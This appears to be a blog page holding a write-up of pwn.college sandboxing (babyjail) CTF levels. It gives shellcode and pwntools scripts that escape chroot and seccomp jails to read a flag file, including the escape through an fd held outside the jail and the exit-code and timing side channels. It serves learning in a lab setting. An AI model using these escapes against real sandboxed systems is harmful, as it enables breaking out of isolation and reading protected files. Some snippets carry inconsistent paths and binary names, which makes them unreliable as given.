<!DOCTYPE html>
<html lang="zh-CN">
<head>
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="0xe598bfe598bfe598bf">
    <meta name="description" content="0xe598bfe598bfe598bf的次元城">
    <meta name="author" content="0x88dfac8bedc5">
    
    <title>
        
            Pwncollege - Sandboxing |
        
        0x88dfac8bedc5的微型次元城
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/dark-magic-house.png">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.8.5/source/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"cyclic-group.github.io","root":"/","language":"zh-CN"}
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true,"layout":"right"},"style":{"primary_color":"#0066cc","logo":"/images/cat-avatar.jpg","favicon":"/images/dark-magic-house.png","avatar":"/images/cat-avatar.jpg","first_screen":{"enable":true,"background_img":"../images/bg.svg","description":"e4 bd a0 e5 a5 bd e5 91 80 e5 98 bf e5 98 bf e5 98 bf ef bd 9e","hitokoto":false},"scroll":{"progress_bar":true,"percent":true}},"local_search":{"enable":true,"preload":false},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"obsidian"},"pjax":{"enable":false},"lazyload":{"enable":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null}},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"version":"3.8.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
    
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="0xe598bfe598bfe598bf的次元城" type="application/atom+xml">
</head>


<body>
    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-YQRLNHYY1E"></script>
    <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'G-YQRLNHYY1E');
    </script>
.progress-bar-container {
  position fixed
  top 0
  left 0
  z-index $z-index-9
  width 100%

  if (hexo-config('pjax') && hexo-config('pjax.enable') == true) {

    .pjax-progress-bar {
      position absolute
      top 0
      left 0
      z-index $z-index-8
      width 0
      height 2px
      background var(--pjax-progress-bar-color)
      visibility hidden
      opacity 0
      transition-t("width, opacity", "0, 0", "0.1, 0.1", "linear")


      &.show {
        visibility visible
        opacity 1
      }
    }


    .pjax-progress-icon {
      position absolute
      top 0.4rem
      right 0.3rem
      z-index $z-index-8
      color var(--text-color-3)
      font-size 1.1rem
      visibility hidden

      +keep-tablet() {
        top 0.3rem
        right 0.2rem
        font-size 1rem
      }

      &.show {
        visibility visible
      }
    }
  }

  if (hexo-config('style') && hexo-config('style.scroll') && hexo-config('style.scroll.progress_bar') == true) {
    .scroll-progress-bar {
      position absolute
      top 0
      left 0
      z-index $z-index-7
      width 0
      height var(--header-scroll-progress-bar-height)
      background var(--primary-color)
      visibility hidden
      transition-t("width", "0", "0.1", "linear")

      &.hide {
        display none !important
      }
    }
  }
}

<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/cat-avatar.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               0x88dfac8bedc5的微型次元城
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            

            <div class="article-content-bottom border-box">
                
                    <div class="article-title">
                        Pwncollege - Sandboxing
                    </div>
                

                
                    <div class="article-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/cat-avatar.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author">
                                <span class="name">0x88dfac8bedc5</span>
                                
                                    <span class="author-label">Lv2</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2023-10-30 16:41:45</span>
                <span class="mobile">2023-10-30 16:41</span>
            </span>

            <!-- <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc" data-updated="Wed Nov 15 2023 22:33:19 GMT+0800">2023-11-15 22:33:19</span>
            </span> -->
        

        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul class="article-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/ctf/">ctf</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="article-content keep-markdown-body">
                    

                    <h2 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h2><p>the CWD of the process is outside the jail &#x3D;&gt; use relative path to locate the flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /</span><br><span class="line">/challenge/babyjail_level1 flag</span><br></pre></td></tr></table></figure>

<h2 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h2><p>the CWD of the process is still outside the jail but this time use shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">; fd = open(&quot;flag&quot;)</span><br><span class="line">lea rdi, [ rip + _path ]                                                                                               </span><br><span class="line">mov rsi,0                                                                                                             </span><br><span class="line">mov rdx, 0                                                                                                             </span><br><span class="line">mov rax, 2                                                                                                             </span><br><span class="line">syscall                                                                                                                </span><br><span class="line"></span><br><span class="line">; sendfile(1, fd, 0, 4096)                                                                                                        </span><br><span class="line">mov rdi, 1                                                                                                             </span><br><span class="line">mov rsi, rax                                                                                                           </span><br><span class="line">mov rdx, 0                                                                                                             </span><br><span class="line">mov r10, 4096                                                                                                          </span><br><span class="line">mov rax, 40                  </span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">; exit(0)</span><br><span class="line">mov rdi, 0                                                                                                             </span><br><span class="line">mov rax, 60                                                                                                            </span><br><span class="line">syscall            </span><br><span class="line"></span><br><span class="line">_path: .string &quot;flag&quot;</span><br></pre></td></tr></table></figure>

<h2 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h2><p>observe that <code>open(argv[1])</code> is called before chroot &#x3D;&gt; use the second argument to open the real root directory, resulting in a fd outside the jail; in the shellcode, call openat with this fd to read the flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/challenge/babyjail_level3 /</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">; fd = openat(3, &quot;flag&quot;, 0, 0)</span><br><span class="line">mov rdi, 3</span><br><span class="line">lea rsi, [ rip + _path ]</span><br><span class="line">mov rdx, 0</span><br><span class="line">mov r10, 0</span><br><span class="line">mov rax, 257</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">mov rdi, 1</span><br><span class="line">mov rsi, rax</span><br><span class="line">mov rdx, 0</span><br><span class="line">mov r10, 4096</span><br><span class="line">mov rax, 40</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">mov rdi, 0</span><br><span class="line">mov rax, 60</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">_path: .string &quot;flag&quot;</span><br></pre></td></tr></table></figure>

<h2 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h2><p>same method as level 3</p>
<h2 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h2><p>like level 3, we can obtain a fd outside the jail, then use linkat syscall to make a hard link inside the jail so that subsequent syscalls can open and print the flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/challenge/babyjail_level3 /</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">; linkat(3, &quot;flag&quot;, 0, &quot;/flag-du&quot;, 0)</span><br><span class="line">mov rdi, 3                                                                                                      [5/545]</span><br><span class="line">lea rsi, [ rip + _path_1 ]                                                                                             </span><br><span class="line">mov rdx, 0                                                                                                             </span><br><span class="line">lea r10, [ rip + _path_2 ]                                                                                             </span><br><span class="line">mov r8, 0</span><br><span class="line">mov rax, 265</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">; open(&quot;/flag-du&quot;, 0, 0)</span><br><span class="line">lea rdi, [ rip + _path_2 ]</span><br><span class="line">mov rsi, 0</span><br><span class="line">mov rdx, 0</span><br><span class="line">mov rax, 2</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">; sendfile(1, &quot;/flag-du&quot;, 0, 4096)</span><br><span class="line">mov rdi, 1</span><br><span class="line">mov rsi, rax</span><br><span class="line">mov rdx, 0</span><br><span class="line">mov r10, 4096</span><br><span class="line">mov rax, 40</span><br><span class="line">syscall </span><br><span class="line"></span><br><span class="line">; exit(0)</span><br><span class="line">mov rdi, 0</span><br><span class="line">mov rax, 60</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">_path_1: .string &quot;flag&quot;</span><br><span class="line">_path_2: .string &quot;/flag_du&quot;</span><br></pre></td></tr></table></figure>

<h2 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h2><p>make a fd outside the jail and fchdir with the fd</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/challenge/babyjail_level3 /</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">; chdir(3)</span><br><span class="line">mov rdi, 3                                                                                                      [5/257]</span><br><span class="line">mov rax, 81                                                                                                            </span><br><span class="line">syscall                                                                                                                      </span><br><span class="line"></span><br><span class="line">; fd = open(&quot;flag&quot;, 0, 0)</span><br><span class="line">lea rdi, [ rip + _path_1 ]                                                                                             </span><br><span class="line">mov rsi, 0                                                                                                             </span><br><span class="line">mov rdx, 0</span><br><span class="line">mov rax, 2</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">; sendfile(0, fd, 0, 4096)</span><br><span class="line">mov rdi, 1</span><br><span class="line">mov rsi, rax</span><br><span class="line">mov rdx, 0</span><br><span class="line">mov r10, 4096</span><br><span class="line">mov rax, 40</span><br><span class="line">syscall </span><br><span class="line"></span><br><span class="line">mov rdi, 0</span><br><span class="line">mov rax, 60</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">_path_1: .string &quot;flag&quot;</span><br></pre></td></tr></table></figure>

<h2 id="Level-7"><a href="#Level-7" class="headerlink" title="Level 7"></a>Level 7</h2><p>the goal is to leave the CWD outside the jail so that it can be used to open the real flag file; to implement this, we can create a new directory inside the current jail and chroot the jail root to the new directory without cd, resulting in the CWD outside the moved jail</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">; mkdir(&quot;/foo&quot;, 0755)</span><br><span class="line">lea rdi, [ rip + _path_0 ]                                                                                             </span><br><span class="line">mov rsi, 0755                                                                                                          </span><br><span class="line">mov rax, 83                                                                                                            </span><br><span class="line">syscall                                                                                                                </span><br><span class="line"></span><br><span class="line">; chroot(&quot;/foo&quot;)                                                                                                                   </span><br><span class="line">lea rdi, [ rip + _path_0 ]                                 </span><br><span class="line">mov rax, 161                 </span><br><span class="line">syscall                      </span><br><span class="line"></span><br><span class="line">; open(&quot;../../flag&quot;, 0, 0)</span><br><span class="line">lea rdi, [ rip + _path_1 ]                                 </span><br><span class="line">mov rsi, 0                   </span><br><span class="line">mov rdx, 0                   </span><br><span class="line">mov rax, 2                   </span><br><span class="line">syscall                      </span><br><span class="line"></span><br><span class="line">mov rdi, 1                   </span><br><span class="line">mov rsi, rax                 </span><br><span class="line">mov rdx, 0                   </span><br><span class="line">mov r10, 4096                </span><br><span class="line">mov rax, 40                  </span><br><span class="line">syscall                      </span><br><span class="line"></span><br><span class="line">mov rdi, 0                   </span><br><span class="line">mov rax, 60                  </span><br><span class="line">syscall </span><br><span class="line"></span><br><span class="line">_path_0: .string &quot;/foo&quot;</span><br><span class="line">_path_1: .string &quot;../../flag&quot;</span><br></pre></td></tr></table></figure>

<h2 id="Level-8"><a href="#Level-8" class="headerlink" title="Level 8"></a>Level 8</h2><p>only openat() is allowed &#x3D;&gt; require a fd outside the jail<br>the challenge no more creates fd using argv[1] &#x3D;&gt; do this manually by redirecting stderr to the root directory</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">shellcode = asm(<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">mov rdi, 2</span></span><br><span class="line"><span class="string">lea rsi, [ rip + _path_1 ]</span></span><br><span class="line"><span class="string">mov rdx, 0</span></span><br><span class="line"><span class="string">mov r10, 0</span></span><br><span class="line"><span class="string">mov rax, 257</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov rdi, 1</span></span><br><span class="line"><span class="string">mov rsi, rax</span></span><br><span class="line"><span class="string">mov rdx, 0</span></span><br><span class="line"><span class="string">mov r10, 4096</span></span><br><span class="line"><span class="string">mov rax, 40</span></span><br><span class="line"><span class="string">syscall </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov rdi, 0</span></span><br><span class="line"><span class="string">mov rax, 60</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">_path_1: .string &quot;flag&quot;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span>)</span><br><span class="line">rtfd = os.<span class="built_in">open</span>(<span class="string">&quot;/&quot;</span>, os.O_RDONLY)                                                                               </span><br><span class="line">p = process([<span class="string">&quot;/challenge/babyjail_level8&quot;</span>,<span class="string">&quot;/&quot;</span>], stderr=rtfd)                                                   </span><br><span class="line">p.send(shellcode)                                                                                              </span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="Level-9"><a href="#Level-9" class="headerlink" title="Level 9"></a>Level 9</h2><p>in the challenge source code, observe that 32-bit mode syscalls are enabled and there is no chroot; given that all available syscall numbers are 3, 4, 5, and 6, we could use 32-bit versions of <code>open()</code>, <code>read()</code>, and <code>write()</code> to print the flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">lea rbx, [ rip + _path ]</span><br><span class="line">mov ecx, 0</span><br><span class="line">mov edx, 0</span><br><span class="line">mov eax, 5</span><br><span class="line">int 0x80</span><br><span class="line"></span><br><span class="line">mov ebx, eax</span><br><span class="line">lea rcx, [ rip + _buf ]</span><br><span class="line">mov edx, 64</span><br><span class="line">mov eax, 3</span><br><span class="line">int 0x80</span><br><span class="line"></span><br><span class="line">mov ebx, 1</span><br><span class="line">lea rcx, [ rip + _buf ]</span><br><span class="line">mov edx, eax</span><br><span class="line">mov eax, 4</span><br><span class="line">int 0x80</span><br><span class="line"></span><br><span class="line">_path: .string &quot;/flag&quot;</span><br><span class="line">_buf: .zero 64</span><br></pre></td></tr></table></figure>

<h2 id="Level-10"><a href="#Level-10" class="headerlink" title="Level 10"></a>Level 10</h2><p>open the flag file via <code>argv[1]</code>, read the flag content into some buffer, and bring the info to <code>stdout</code> one byte each time via <code>exit()</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">crack</span>():</span><br><span class="line">    flag_list = []</span><br><span class="line">    <span class="keyword">for</span> offset <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        sc = asm(<span class="string">f&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">        mov rdi, 3</span></span><br><span class="line"><span class="string">        lea rsi, [ rip + _buf ]</span></span><br><span class="line"><span class="string">        mov rdx, 64</span></span><br><span class="line"><span class="string">        mov rax, 0</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        </span></span><br><span class="line"><span class="string">        mov dil, [ rip + _buf + <span class="subst">&#123;offset&#125;</span> ] </span></span><br><span class="line"><span class="string">        mov rax, 60</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        </span></span><br><span class="line"><span class="string">        _buf: .zero 64</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span>)</span><br><span class="line">        p = process([<span class="string">&quot;/challenge/babyjail_level10&quot;</span>, <span class="string">&quot;/flag&quot;</span>])</span><br><span class="line">        p.send(sc)</span><br><span class="line">        exit_code = p.poll(<span class="literal">True</span>)</span><br><span class="line">        flag_list.append(exit_code)</span><br><span class="line">    <span class="keyword">return</span> flag_list</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">bytes</span>(crack()))</span><br></pre></td></tr></table></figure>

<h2 id="Level-11"><a href="#Level-11" class="headerlink" title="Level 11"></a>Level 11</h2><p>prepare shellcode(index, value) such that the process sleeps iff flag[index] &#x3D;&#x3D; value, then set a threshold time for the running process to tell if sleep() has been triggered or not, finally iterate all possible indices and values to test out the flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">verify</span>(<span class="params">index, value</span>):                                                                                              </span><br><span class="line">        sc = asm(<span class="string">f&quot;&quot;&quot;                                                                                                  </span></span><br><span class="line"><span class="string">        mov edi, 3                                                                                                     </span></span><br><span class="line"><span class="string">        lea rsi, [ rip + _buf ]                                                                                        </span></span><br><span class="line"><span class="string">        mov edx, 64                                                                                                    </span></span><br><span class="line"><span class="string">        mov eax, 0                                                                                                     </span></span><br><span class="line"><span class="string">        syscall                                                                                                        </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        cmp byte ptr [ rip + _buf + <span class="subst">&#123;index&#125;</span> ], <span class="subst">&#123;value&#125;</span></span></span><br><span class="line"><span class="string">        je _sleep</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        _buf: .zero 64</span></span><br><span class="line"><span class="string">        _req: .quad 99, 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        _sleep:</span></span><br><span class="line"><span class="string">        lea rdi, [ rip + _req ]</span></span><br><span class="line"><span class="string">        mov esi, 0</span></span><br><span class="line"><span class="string">        mov rax, 35 </span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        _substrate: .zero 8</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span>)               </span><br><span class="line"></span><br><span class="line">        p = process([<span class="string">&quot;/challenge/babyjail_level11&quot;</span>, <span class="string">&quot;/flag&quot;</span>])</span><br><span class="line">        p.send(sc)</span><br><span class="line">        sleep(<span class="number">1</span>)</span><br><span class="line">        imm_exit_code = p.poll()</span><br><span class="line">        p.kill()</span><br><span class="line">        <span class="keyword">return</span> imm_exit_code == <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">crack</span>(<span class="params">flag_array, n</span>):</span><br><span class="line">    <span class="keyword">for</span> index <span class="keyword">in</span> <span class="built_in">range</span>(n*<span class="number">8</span>, n*<span class="number">8</span> + <span class="number">8</span>):</span><br><span class="line">        <span class="keyword">for</span> value <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">            <span class="keyword">if</span> verify(index, value):</span><br><span class="line">                flag_array[index] = value</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">flag_array = multiprocessing.Array(<span class="string">&#x27;d&#x27;</span>, [<span class="number">0</span>]*<span class="number">64</span>)</span><br><span class="line">workers = [multiprocessing.Process(target=crack, args=(flag_array, n)) <span class="keyword">for</span> n <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>)]</span><br><span class="line"><span class="keyword">for</span> worker <span class="keyword">in</span> workers:</span><br><span class="line">    worker.start()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">bytes</span>(flag_array))</span><br></pre></td></tr></table></figure>
<h2 id="Level-12"><a href="#Level-12" class="headerlink" title="Level 12"></a>Level 12</h2><p>in this level only read() syscall is allowed; we can prepare shellcode(index, value) so that an extra read() is triggered iff flag[index] &#x3D;&#x3D; value, that is, the process is blocked for reading iff flag[index] &#x3D;&#x3D; value, then we can observe its runtime behavior to tell if the extra read() hsa been triggered</p>
